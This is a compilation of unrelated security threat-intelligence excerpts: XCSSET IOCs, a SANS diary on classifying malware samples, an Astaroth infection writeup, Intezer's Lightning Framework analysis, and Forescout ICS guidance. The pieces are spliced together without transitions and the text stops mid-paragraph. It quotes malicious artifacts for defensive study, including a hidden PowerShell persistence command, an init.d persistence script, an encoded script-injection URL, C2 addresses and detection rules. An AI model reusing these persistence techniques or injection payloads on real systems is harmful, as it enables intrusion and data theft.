It seems a new trojan is going around and affecting @Apple #iOS builds. I don’t know the original method of infection, but I’m starting to see some public repos on GitHub being affectedhttps://t.co/EmutE0jCbD

— Pier Fumagalli 💉💉💉🦠💉😷 (@ianosh) June 4, 2021

At this point in time, it’s unclear whether these infected repos are victims or plants by threat actors hoping to infect unwary users. It has been suggested that unsuspecting users may be pointed to the infected repositories through tutorials and screencasts for novice developers. Our research into XCSSET and its infection vectors continues.

Staying Protected Against XCSSET Malware on macOS

XCSSET has many moving parts, and samples change rapidly. While some static signatures such as those used in Apple’s XProtect service will detect known samples, full protection against evolving threats like these is only really possible with a multi-engine agent including behavioral AI.

SentinelOne Singularity fully protects SentinelOne customers against XCSSET malware.

With the agent policy set to ‘Protect’, the malware is prevented from executing or dropping any of its components. For this demonstration, we set the policy to ‘Detect-only’ in order to observe further stage payloads.

Indicators of Compromise

Scripts
25f8d7ac99e00c9d69679f2d9aca5954d2609a03 ./brave_remote.applescript
0e1b2f01441e6e6fc8a48a7871e649d3647828cd ./canary_remote.applescript
4c368635ecfee61a89203f3f0e84bfdd7d85073d ./chrome_remote.applescript
2a2330b13886ffe0e4fe54f7254008490814b5fa ./chromium_remote.applescript
fd82b821fa2c23f2b88f64179e3a7a8905c1e40b ./contacts.applescript
bde20788e2656454052aae9baf2f4d2b7c256c9d ./edge_remote.applescript
3f35fd8306d4a05fadd9095acacd8d5f297a112e ./firefox_remote.applescript
3de232d0a42959b20703ebb9d9376b3ef3d3015d ./firewall_off.applescript
3257a1f540455444a56975e7fd9cdb6f8148b828 ./listing.applescript
2dbf06445a294b4f786501ef16ea4aabd8e1ad72 ./notes.applescript
6c0b4e3e3bac36f3228e69ab1e53884f76f6828b ./notes.py
6cf1ec6af6c6102c9d4929b1a83e0a463e737255 ./notes_app.applescript
73918b840384e485d009632fdf1a396758d7c515 ./opera_remote.applescript
e2de10a6b517e298cb2e7da150224dfe7e5717a7 ./payloader.applescript
5e673f4c494c424ae450f2ea5c0b066f912edccb ./pods_infect.applescript
73d9a443933fb0c40dde3065ec77adad35a5c49a ./remove_old.applescript
5b66e4b1556ad03b4bf072d061de0606eabe8603 ./replicator.applescript
672837de18d0e34f8b2a77bc2646b245671c83dc ./safari_remote.applescript
b66dbd55ce42a61cfedd06f31725b7f56d10d548 ./safari_update.applescript
fb29c9daa6fdeaa945446fe7cde185d51296dc7d ./telegram.applescript
760676a2e05d25959dee1f9ffaf3042e5f2e0f31 ./telegram_lite.applescript
4ffb268475e3816b22aadfb147bd7cd2f211e3d5 ./uploader.applescript
c2a90c68ad9d93139ebce981a409beae5d7de8bf ./yandex_remote.applescript
d70f4974bd531af674c5c2da3bc3c7d1a0ac9b54 ./360_remote.applescript
a57b73190525a729d821b6aed6849084fc1beddd ./a.applescript

Binaries
127b66afa20a1c42e653ee4f4b64cf1ee3ed637d ./exec.2430808
f4099a0884d3f1bf5602c8c6ba5265b76d7f4953 ./Pods
dde87aefcaf788f770e5e1229db4fe73873e1c36 ./agentd
bd13d22095d377938c50088e59fa3079143cb0f2 ./braved
a1449c5fbf8cf126502bd68a8e8d657b3dcfd87a ./canaryd
cbf08fae71fcd46cc852fad7502685466c40e168 ./edged
2a62d6bcac7b0c5e75f561458e934ec45c77699c ./firefoxd
263b243df32be6d9d9878c459d2fc6491342d547 ./metald
f3a747bf10763d7d8c1cd9ccedd1e25ee195fce3 ./open
2a6d37160f21ec13aa6c692a3ca3374db3d35e96 ./operad
1396fdbff38b787d14b1135dcdfc367658669637 ./speedd
e4b6c56faa97493dc0f0f7c4fc2196096ef66513 ./yandexd

Communications
adobefile[.]ru
appledocs[.]ru
Cosmodron[.]com
gismolow[.]com
gurumades[.]ru
kinksdoc[.]ru
melindas[.]ru
superdocs[.]ru
45[.]82[.]153[.]92

executive-view.jpg

by John Tolbert

Organizations and individuals are constantly under threat by malware. Malware variants evolve and proliferate daily, making it increasingly difficult to prevent infections, compromises, and consequences such as data leakage and damage. While Endpoint Protection (EPP) solutions are primarily designed to prevent malware infection, Endpoint Detection & Response (EDR) solutions are intended to discover and remediate compromises by malware. Both kinds of products are necessary security infrastructure in today’s business reality. Malwarebytes Nebula is their EPDR offering, and Malwarebytes Incident Response adds granular remediation capabilities. Malwarebytes Incident Response (IR) Proprietary Linking Engine technology scans networked endpoints to root out and destroy the malware already downloaded and activated on a system. IR may be deployed as a standalone and easily integrated into existing infrastructure.

There are two main types of malware analysis: static and dynamic. Performing static analysis of a malicious binary means concentrating on analyizing its code without executing it. This type of analysis may reveal to malware analysts not only what the malware does, but also its developer’s future intentions (e.g., currently unfinished functionalities). Dynamic analysis looks at the behavior of the malware when it’s run – usually in a virtual sandbox. This type of analysis should … More

The post 7 open-source malware analysis tools you should try out appeared first on Help Net Security.

Last week, I was teaching FOR610 in Amsterdam. When we review ASM, we have a module about the difference in 32-bits VS. 64-bits code (how parameters are passed to functions/API calls, calling convention, etc). It’s important to have an understanding of this because most computers are build around a 64-bits CPU today. But attackers are still deploying a lot of 32-bits malware for compatibility reasons and also because this code can be run without (if you respect Microsoft guidelines and API’s) problems. A student asked me if there was a lot of native 64-bits malware in the wild. Is there a real trend? I decided to have a look at a bunch of samples and see practically if this trend was real.

The problem is to get enough samples. I’ve my own “malware zoo” but it’s pretty small. You can try to get samples from major players like VirusTotal but your API quotas won’t probably allow you to download a lot of samples. I decided to have a look at free resources (but still trusted). My choice was to use MalwareBazaar[1]. I like this service provided by abuse.ch. They allow to download samples for free and report also some interesting stats based on YARA rules[2].

I downloaded all daily archives from Feb 27 2020 until last week (217GB of zip archives). To detect if a PE file is 32-bits or 64-bits code, you just check a few bytes at the beginning of the file:

00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ…………..
00000010: b800 0000 0000 0000 4000 0000 0000 0000 ……..@…….
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
00000030: 0000 0000 0000 0000 0000 0000 8000 0000 …………….
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ……..!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode….$…….
00000080: 5045 0000 4c01 0900 8406 f862 0000 0000 PE..L……b….
00000090: 0000 0000 e000 2e03 0b01 0223 0004 ac00 ………..#….
000000a0: 005a e900 0008 0000 b014 0000 0010 0000 .Z…………..
000000b0: 0020 ac00 0000 4000 0010 0000 0002 0000 . ….@………
000000c0: 0400 0000 0100 0000 0400 0000 0000 0000 …………….
000000d0: 00c0 e900 0004 0000 179d e900 0200 4001 …………..@.

If you read “PE..L”, it’s a 32-bits sample, if it’s “PE..d”. I wrote a quick and dirty YARA rule to match these sequences of bytes:

rule pe32bits
{
meta:
description = “Match a 32-bits PE”
strings:
$a = {50 45 00 00 4c}
condition:
$a in (0..500)
}
rule pe64bits
{
meta:
description = “Match a 64-bits PE”
strings:
$a = {50 45 00 00 64}
condition:
$a in (0..500)
}

 Because I had a lot of ZIP archives to process and to not use too much storage, I used Python to process all files from ZIP archives and use the YARA rule against them. I focussed only on “.exe” and “.dll” files:

#!/usr/bin/python3
import datetime
import glob
import re
import yara
from zipfile import ZipFile
rules = yara.compile(filepath=’3264.yar’)
print(“data,file,arch”)
zipList = glob.glob(‘*.zip’)
for zip in zipList:
day = datetime.datetime.strptime(zip.split(“.”)[0], ‘%Y-%m-%d’).strftime(“%d/%m/%Y %H:%M:%S”)
with ZipFile(zip, ‘r’) as zipObj:
zipObj.setpassword(b”infected”)
files = zipObj.infolist()
for f in files:
if re.match(r'[0-9]+.*.(exe|dll)’, f.filename):
with zipObj.open(f.filename,mode=’r’) as fdata:
matches = rules.match(data=fdata.read())
if len(matches) > 0:
print(“%s,%s,%s” % (day, f.filename, matches[0]))

Let’s have a look at the results. I loaded the CSV file in my Splunk.

175.962 samples have been inspected (only EXE & DLL files)
10.952 were detected as 64-bits code (6.224%)
Only 1 DLL was detected as 64-bits code (HASH:86150c570e2d253d54fd5f70c9fe62ff37897dc3a7b21658fa891263a843790d)

If we check on a timeline, we have a small trend:

I’ve no idea about the peak of samples submitted in November 2021 but we see that, especially the last months, they are more and more 64-bits samples in the wild. Can we rely on these statistics? Samples downloaded from MalwareBazaar are only the visible part of the iceberg but, as it became popular, many security researchers use it. If you have other statistics, please share with us!

[1] https://bazaar.abuse.ch
[2] https://bazaar.abuse.ch/export/json/yara-stats/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

Today’s diary is a quick post of an Astaroth (Guildma) malware infection I generated todayy on Friday 2022-08-19 from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA.  Boleto is a payment method used in Brazil, while Grupo Solução & CIA is Brazil-based company.

Images from the infection


Shown above:  Screenshot of the malicious email with link to download a malicious zip archive.


Shown above:  Link from email leads to web page pretending to be from Docusign that provides malicious zip archive for download.


Shown above:  Downloaded zip archive contains a Windows shortcut and a batch file.  Both are designed to infect a vulnerable Windows host with Astaroth (Guildma).


Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (part 2 of 3).


Shown above:  Artifact from the infected host’s C:UsersPublic directory.


Shown above:  Artifact on the infected host’s C: drive at C:J9oIM9JJ9oIM9J.jS.


Shown above:  Windows shortcut in the infected user’s RoamingMicrosoftWindowsStart MenuProgramsStartup directory to keep the infection persistent.


Shown above:  Directory with persistent files used for the Astaroth (Guildma) infection.


Shown above:  Astaroth (Guildma) performs post-infection data exfiltration through HTTP POST requests.

Indicators of Compromise (IOCs)

Link from email:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloud

IP address and TCP port for initial malicious domain:

172.67.217[.]95 port 80 – w7oaer.infocloudgruposolucaoecia[.]link

URL to legitimate website generated from iframe in the above traffic:

hxxp://www.intangiblesearch[.]it/search/home_page.php?db_name=%3Cscript%20src=%22https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js%22%3E%3C/script%3E%3Cscript%20type=%22text/javascript%22%20src=%22hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036%22%3E%3C/script%3E?

Traffic to initial malicious domain that provides zip archive download:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036
hxxp://w7oaer.infocloudgruposolucaoecia[.]link//inc.php?/gruposolucaoeciainfocloud
hxxp://w7oaer.infocloudgruposolucaoecia[.]link/YBZJPTBQV/482NJ8NS74J9/N6D6WW/gruposolucaoeciainfocloud_097.88933.61414z64y64

Traffic generated by Windows shortcut or batch file from the downloaded zip archive:

172.67.212[.]174:80 ahaaer.pfktaacgojiozfehwkkimhkbkm[.]cfd GET /?1/
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?59792746413628799
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?59792746413628799
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?33954141807632999
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?33954141807632999
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?71576927405639060
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?71576927405639060
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?59784568396678051
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?59784568396678051
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?40018133101693668
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?40018133101693668
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?33450285101613952
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?33450285101613952

Data exfiltration through HTTP POST requests:

104.21.25[.]34:80 hcu11m2mkk2.rouepcgomfhejergdahjcfcugarfcmoa[.]tk POST /
172.67.165[.]46:80 j2vfrc7gddo.aeabihjpejprueuibdjmhfmdcpsfr[.]gq POST /

Example of downloaded zip archive:

SHA256 hash: f254f9deeb61f0a53e021c6c0859ba4e745169322fe2fb91ad2875f5bf077300

File size: 1,091 bytes
File name: gruposolucaoeciainfocloud_097.88933.61414.zip

Contents from the above zip archive:

SHA256 hash: 5ca1e9f0e79185dde9655376b8cecc29193ad3e933c7b93dc1a6ce2a60e63bba

File size: 338 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.cmd

SHA256 hash: db136e87a5835e56d39c225e00b675727dc73a788f90882ad81a1500ac0a17d6

File size: 1,341 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.lNk

Command from Windows shortcut in Windows Startup folder on the infected Windows host:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden -Command C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log

Files used for persistent infection:

SHA256 hash: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

File size: 893,608 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe
File description: Windows EXE for AutoIt v3, not inherently malicious

SHA256 hash: e31658734d3e0de1d2764636d1b8726f0f8319b0e50b87e5949ec162ae1c0050

File size: 246,116 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log
File description: Malicious data binary, AutoIt v3 compiled script run by above Windows EXE for AutoIt v3

Final words

A pcap of the infection traffic, the associated malware/artifacts, and the email that kicked off this infection are available here.

Brad Duncan
brad [at] malwre-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

flag.png

Original release date: August 2, 2022 | Last revised: August 4, 2022

CISA and the Australian Cyber Security Centre (ACSC) have published a joint Cybersecurity Advisory on the top malware strains observed in 2021. Malicious cyber actors often use malware to covertly compromise and then gain access to a computer or mobile device. As malicious cyber actors have been using most of these top malware strains for more than five years, organizations have opportunities to better prepare, identify, and mitigate attacks from these strains.  

CISA and ACSC encourage organizations to apply the recommendations in the Mitigations sections of the joint CSA. These mitigations include prioritizing patching all systems with known exploited vulnerabilities, enforcing multifactor authentication (MFA), securing remote desktop protocol (RDP) and other risky services, making offline backups of your data, and providing end-user awareness and training about social engineering and phishing. The appendix contains detection signatures organizations can employ in defending their networks. For more information on preventing malicious cyber actors from using 2021 top malware strains to exploit vulnerabilities, see:

•    CISA’s Known Exploited Vulnerabilities Catalog 
•    CISA’s Cyber Hygiene Services
•    CISA’s Choosing and Protecting Passwords
•    ACSC’s Implementing Multi-Factor Authentication
 

 

This product is provided subject to this Notification and this Privacy & Use policy.

Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has modular plugins and the ability to install rootkits.

Year after year Linux environments increasingly become the target of malware due to continued threat actor interest in the space. Malware targeting Linux environments surged in 2021, with a large amount of innovation resulting in new malicious code, especially in ransomwares, trojans, and botnets. With the rise in use of the cloud, it is no wonder that malware innovation is still accelerating at breakneck speed in this realm.

This is a technical analysis of a previously undocumented and undetected Linux threat called the Lightning Framework. It is rare to see such an intricate framework developed for targeting Linux systems. Lightning is a modular framework we discovered that has a plethora of capabilities, and the ability to install multiple types of rootkit, as well as the capability to run plugins. The framework has both passive and active capabilities for communication with the threat actor, including opening up SSH on an infected machine, and a polymorphic malleable command and control configuration. We are releasing this blog for informational purposes. We do not have all the files that are referenced in the framework, but hope that this release will help others if they possess other pieces of the jigsaw puzzle. We have not observed this malware being used in attacks in the wild.

Technical Analysis of Lightning Framework

The framework consists of a downloader and core module, with a number of plugins. Some of the plugins used by the malware are open-source tools. Below is a figure of the framework layout:

Lightning framework new linux threat

Overview of the Modules

NameName on DiskDescriptionLightning.DownloaderkbiosetThe persistent module that downloads the core module and its pluginsLightning.CorekkdmflushThe main module of the Lightning FrameworkLinux.Plugin.Lightning.SsHijackersossThere is a reference to this module but no sample found in the wild yet.Linux.Plugin.Lightning.SshdsshodOpenSSH with hardcoded private and host keysLinux.Plugin.Lightning.NethogsnethoogsThere is a reference to this module but no sample found in the wild yet. Presumably the software NethogsLinux.Plugin.Lightning.iftopiftoopThere is a reference to this module but no sample found in the wild yet. Presumably the software iftopLinux.Plugin.Lightning.iptrafiptraofThere is a reference to this module but no sample found in the wild yet. Presumably the software IPTrafLinux.Plugin.RootkieHidelibsystemd.so.2There is a reference to this module but no sample found in the wild yet. LD_PRELOAD RootkitLinux.Plugin.Kernelelastisearch.koThere is a reference to this module but no sample found in the wild yet. LKM Rootkit

Lightning.Downloader

The main function of the downloader module is to fetch the other components and execute the core module.

Lightning framework downloader result in Intezer AnalyzeLightning Downloader result in Intezer Analyze

The downloader module starts by checking if it is located in the working directory /usr/lib64/seahorses/ under the name kbioset. The framework makes heavy use of typosquatting and masquerading in order to remain undetected. The reference to seahorses masquerades the password and key manager software seahorse. If not it will relocate itself to that working directory and execute that copy. The downloader will fingerprint the host name and network adapters to generate a GUID, which will be sent to the command and control (C2) server. 

Building the GUID

The downloader will then contact the C2 to fetch the following modules and plugins:

Linux.Plugin.Lightning.SsHijackerLinux.Plugin.Lightning.SshdLinux.Plugin.Lightning.NethogsLinux.Plugin.Lightning.iftopLinux.Plugin.Lightning.iptrafLightning.Core

Resources fetched from the C2

The method of contacting the C2 will be described below in the malleable C2 section (click here to jump to that section). The downloader will then execute the core module (kkdmflush). 

lightning framework excution of core moduleExecution of the core module

Lightning.Core

The core module is the main module in this framework, it is able to receive commands from the C2 and execute the plugin modules. The module has many capabilities and uses a number of techniques to hide artifacts to remain running under the radar. 

The core module modifies the name of the calling thread of the module to kdmflush, to make it appear that it is a kernel thread. 

Using prctl to modify calling thread name

Next the core module sets up persistence by creating a script that is executed upon system boot. This is achieved by first creating a file located at /etc/rc.d/init.d/elastisearch. The name appears to typosquat elasticsearch. The following contents are written to the file:

#!/bin/bash
# chkconfig:2345 90 20
/usr/lib64/seahorses/kbioset &

This script will execute the downloader module upon boot. The service is then added using the chkconfig utility. 

Creation of the init.d script and service

The timestamp of the file is modified to hide artifacts, a technique known as “timestomping”. The file has its last modified time edited to match that of either whoami, find, or su. It will look for each file respectively until it finds one. This technique is used for most of the files that the framework creates.

File timestamp modification function

The malware will attempt to hide its Process ID (PID) and any related network ports. This is achieved by writing the frameworks running PIDs to two files: hpi and hpo. These files are parsed and then the existence of the file proc/y.y is checked. If the file exists, it means that a rootkit has been installed. The PIDs are written to proc/y.y for use by the rootkit, which may scrub any reference to files running in the framework from commands such as ps and netstat.

Writing PID to proc/y.y if it exists (Indication that rootkit exists)

The core module will generate a GUID in the same manner as the downloader and contact the C2. The response is parsed and the command is executed. The core module has the following commands:

CommandDescriptionSystemInfoFingerprints the machinePureShellCommandRuns Shell commandRunShellPureStarts the Linux.Plugin.Lightning.Sshd (SSH Daemon) pluginCloseShellPureTerminates the Linux.Plugin.Lightning.Sshd pluginDisconnectExits the Core moduleGetRemotePathInfoCollects the summary of given pathKeepAliveNo action, connection remains aliveUploadFileHeaderChecks access of fileFileEditGets contents of file and time metaTryPassSSHAdds a public key to the root/.ssh/authorized_keys fileDeleteVecFileDeletes the specified file or pathPreDownloadFileCalculates a checksum of the fileDownloadFileSends a file to the C2DeleteGuidRemoves the frameworkUpdateVersionCalls the Downloader module to update the frameworkUpdateRemoteVersionUpdates the framework including the downloaderSocks5Sets up a Socks5 proxyRestorePlugThe same as UpdateVersionGetDomainSettingFetches the contents of the malleable C2 configuration file (cpc)SetDomainSettingUpdates the contents of the malleable C2 configuration file (cpc)InstallKernelHideFetches the OS releaseRemoveKernelHideRemoves kernel moduleUpdateKernelVersionRemoves the kernel module and runs uname -rOverrideFileOverwrites specified fileUploadFileContentWrites data sent from server to fileLocalPluginRequestEither write the LD_PRELOAD rootkit or LKM rootkit

Network Communication

Network communication in the Core and Downloader modules are performed over TCP sockets. The data is structured in JSON. The C2 is stored in a polymorphic encoded configuration file that is unique for every single creation. This means that configuration files will not be able to be detected through techniques such as hashes. The key is built into the start of the encoded file.

Encoded malleable C2 configuration profile

The dynamic XOR decoding routine 

The decoded configuration is structured in JSON. The default configuration in the analyzed sample uses a local IP address 10.2.22[.]67 with the port 33229. 

Decoded default configuration

There is a passive mode of communication available if the actor executes the RunShellPure command. This starts an SSH service on the infected machine with the Linux.Plugin.Lightning.Sshd plugin. The plugin is an OpenSSH daemon that has hardcoded private and host keys, allowing the attacker to SSH into the machine with their own SSH key, creating a secondary backdoor. 

Hardcoded keys inside the modified OpenSSH daemon

Summary

The Lightning Framework is an interesting malware as it is not common to see such a large framework developed for targeting Linux. Although we do not have all the files, we can infer some of the missing functionality based on strings and code of the modules that we do possess. Soon we will release a another blog about detection opportunities for Lightning Framework using osquery.

We would like to extend a huge thanks to our friends and partners at IBM and SentinelOne for their help during investigating this threat.

IOCs for Lightning Framework

Hashes

FileSHA256Lightning.Downloader48f9471c20316b295704e6f8feb2196dd619799edec5835734fc24051f45c5b7Lightning.Corefd285c2fb4d42dde23590118dba016bf5b846625da3abdbe48773530a07bcd1eLinux.Plugin.Lightning.Sshdad16989a3ebf0b416681f8db31af098e02eabd25452f8d781383547ead395237

Detection Rules

title: Lightning Framework File Path
status: experimental
description: Detects creation of files related to Lightning Framework.
author: Intezer
references:
– https://www.intezer.com
logsource:
product: linux
category: file_create
detection:
selection1:
TargetFilename|startswith:
– ‘/usr/lib64/seahorses/’
selection2:
TargetFilename|contains:
– ‘kbioset’
– ‘cpc’
– ‘kkdmflush’
– ‘soss’
– ‘sshod’
– ‘nethoogs’
– ‘iftoop’
– ‘iptraof’
condition: selection1 and selection2
falsepositives:
– Unknown.

title: Lightning Default C2 Communication
status: experimental
description: Detects communication to default local ip for Lightning Framework
author: Intezer
references:
– https://intezer.com
logsource:
category: firewall
detection:
select_outgoing:
dst_ip: 10.2.22.67
dst_port: 33229
condition: select_outgoing
falsepositives:
– Unknown.

MITRE ATT&CK

TacticTechniqueIDDescriptionPersistenceBoot or Logon Initialization ScriptsT1037An init.d script is used for persistence of downloader modulePersistenceSSH Authorized KeysT1098.004SSH keys can be added to the authorized_keys fileDefense EvasionObfuscated Files or InformationT1027The C2 profile is encoded on diskDefense EvasionDeobfuscate/Decode Files or InformationT1140The C2 profile is decoded with a dynamic XOR algorithmDefense EvasionHide ArtifactsT1564Many artifacts are hidden including ports, PIDs, and file timestampsDefense EvasionMasqueradingT1036Many files are masqueraded as other files or tasksDefense EvasionRootkitT1014LKM and LD_PRELOAD rootkits are usedDefense EvasionTimestompT1070.006Files created by Lightning are modified to match that of other utilitiesDefense EvasionFile DeletionT1070.004The framework has the ability to remove itselfDiscoveryFile and Directory DiscoveryT1083The framework can list files and directories on infected systemsDiscoveryNetwork Service DiscoveryT1046Multiple plugins can be used to perform network service discoveryDiscoveryNetwork SniffingT1040Multiple plugins can be used to perform network sniffingDiscoverySystem Information DiscoveryT1082Lightning can perform detailed system fingerprintingCommand and ControlData EncodingT1132Data from the C2 is encodedCommand and ControlNon-Application Layer ProtocolT1095Communication with the C2 is performed over TCPCommand and ControlProxyT1090The framework has the ability to start a Socks5 proxyCommand and ControlExfiltration Over C2 ChannelT1041Data can be exfiltrated

The post Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware ⚡ appeared first on Intezer.

The Russian hacking group Turla released an Android app that seems to aid Ukrainian hackers in their attacks against Russian networks. It’s actually malware, and provides information back to the Russians:

The hackers pretended to be a “community of free people around the world who are fighting russia’s aggression”—much like the IT Army. But the app they developed was actually malware. The hackers called it CyberAzov, in reference to the Azov Regiment or Battalion, a far-right group that has become part of Ukraine’s national guard. To add more credibility to the ruse they hosted the app on a domain “spoofing” the Azov Regiment: cyberazov[.]com.

[…]

The app actually didn’t DDoS anything, but was designed to map out and figure out who would want to use such an app to attack Russian websites, according to Huntely.

[…]

Google said the fake app wasn’t hosted on the Play Store, and that the number of installs “was miniscule.”

Details from Google’s Threat Analysis Group here.

In our new threat briefing report, Forescout’s Vedere Labs presents the most detailed public technical analysis of Industroyer2 and INCONTROLLER (also known as PIPEDREAM), the newest examples of ICS-specific malware that were disclosed to the public almost simultaneously, on April 12 and 13. Thankfully, both Industroyer2 and INCONTROLLER were caught before causing physical disruption.

Although there have been previous reports about both malware families analyzed in this research, we present the following new contributions:

Description of a functionality in Industroyer2 to discover the target’s Common Address of ASDU. Despite not being used in the analyzed sample, given its hardcoded configuration, this might have been used in previous reconnaissance stages to gather information about the target.
An analysis of the similarity of the IEC-104 implementation in Industroyer that reveals it is probably a modified version of a publicly available implementation.
The most detailed public description so far of Lazycargo, a part of INCONTROLLER that became publicly available recently and is used to execute other parts of the malware.

In this post, we detail how Forescout helps to protect against the new malware. The full report also contains a list of indicators of compromise (IOCs) and recommended mitigations.

Overview of the new ICS-specific malware

Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 industrial protocol. INCONTROLLER is a full toolkit containing modules to send instructions to or retrieve data from ICS devices using industrial network protocols such as OPC UA, Modbus, CODESYS, Machine Expert Discovery and Omron FINS. Additionally, Industroyer2 has a highly targeted configuration, while INCONTROLLER is much more reusable across different targets.

ICS-specific malware is still very rare compared to commodity malware such as ransomware or banking trojans. Industroyer2 and INCONTROLLER follow previous known examples such as Stuxnet, Havex, BlackEnergy2, Industroyer and TRITON, shown in the timeline below.

 

Industroyer2 is believed to be developed and deployed by the Sandworm APT, linked to the Russian GRU, which was behind the original attacks on the Ukrainian power grid in 2015 and 2016. The Industroyer2 incident follows recent activity against the APT in 2022, such as the disruption of the Cyclops Blink botnet. There is still no conclusive evidence about the actors behind INCONTROLLER, their motives or objectives.

Both new malwares show that abusing often insecure-by-design native capabilities of OT equipment continues to be the preferred modus operandi of real-world attackers. Vedere Labs recently disclosed a set of 56 insecure-by-design vulnerabilities in OT equipment called OT:ICEFALL, which included Omron controllers that were targeted by INCONTROLLER. The emergence of new vulnerabilities and new malware exploiting the insecure-by-design nature of OT supports the need for robust OT-aware network monitoring and deep packet inspection capabilities.

For more information and technical analysis, read the full report.

Read the Full Report

Mitigation recommendations for ICS malware

Forescout eyeInspect customers can follow the recommendations below to help ensure they are protected against Industroyer2 and INCONTROLLER.

Stay current with the release of additional content such as scripts and IOCs on the OT Portal or through your Forescout representatives.
Monitor network exposure for control systems and HMIs.
Monitor connections to devices outside of documented norms for the device and environment, with special attention to HTTP and Telnet connections to these devices.
Monitor unauthorized Telnet connection attempts, including the use of default credentials.
Detect ICMP usage and especially possible ping sweeps through the ICMP indicators in the Industrial Threat Library devoted to detect possible port scans and discoveries.
Apply additional configurations on eyeInspect to perform intrusion detection on known nodes. Available approaches include protocol blacklisting and communication whitelisting with traffic rules.
Leverage the Threat Detection Add-Ons script, which contains additional checks for lateral movement and user account manipulation that may reveal attempts to gain administrative rights.
Closely monitor the protocols abused by both new malwares for signs of anomalies: IEC-104 (2404/TCP), OPC UA (4840/TCP, 4843/TCP), Modbus (502/TCP), Machine Expert Discovery (27126/UDP, 27127/UDP), CODESYS (1740-1743/UDP, 11740-11743/TCP, 1105/TCP) and Omron FINS (9600/TCP, 9600/UDP) . Below, are specific recommendations for each protocol in eyeInspect.

IEC-104

eyeInspect has extensive coverage of IEC-104 anomalies with malformed packet detection (possible indicator of exploit), anomaly baselining detection and a vast Industrial Threat Library covering anomalous behaviors, dangerous operations and much more.

OPC UA

Monitor the alerts and events related to the OPC UA protocol. eyeInspect offers dozens of events related to anomalies like credential bruteforcing, bad certificate usage, anomalous connection attempts, configuration changes and changes to OPC UA tags.
Monitor OPC UA connections, especially newly established or anomalous OPC UA connections through dedicated filters, analytics, maps and the change logs.

MODBUS/Schneider Electric

Monitor the alerts and events related to the MODBUS protocol. eyeInspect offers dozens of events related to anomalies like error codes associated with abnormal device crashes/reboots, files uploaded or downloaded, file deletion, unauthorized changes in device configuration and execution of commands.
Add an anomaly detection-specific blacklisting rule on ports 27126 and 27127 that target IP broadcast 255.255.255.255, to identify the Machine Expert Discovery protocol used in the initial phase. (A premade profile is available on request through Forescout representatives or Customer Support.)
Install the new Device and Visibility Addons Script 3.2 (or newer) to detect and vet devices using this discovery protocol.

OMRON FINS

Implement the OMRON FINS Monitor script to receive more alerts and details about unauthorized changes in device configuration and execution of commands, files uploaded or downloaded and tons of other anomalies (available on request through Forescout representatives).

The post Industroyer2 and INCONTROLLER: New Findings and How Forescout Protects Against the Most Recent ICS-Specific Malware appeared first on Forescout.

cybercenter-1200x630-e_1.jpg

2022-06-17-ISC-diary-image-00a.jpg

Introduction

Malware often forms the foundation for an adversary cyberattack, giving adversaries a means to employ a range of tactics, techniques, and procedures (TTPs) against a target to achieve their strategic objectives. For analysts, adversary malware also provides insights into an adversary’s behavior when more complete incident response data is unavailable, particularly at the procedure level. Defenders can then improve their security posture by testing their defenses against the malware advance. But only if the assessment can be done easily.

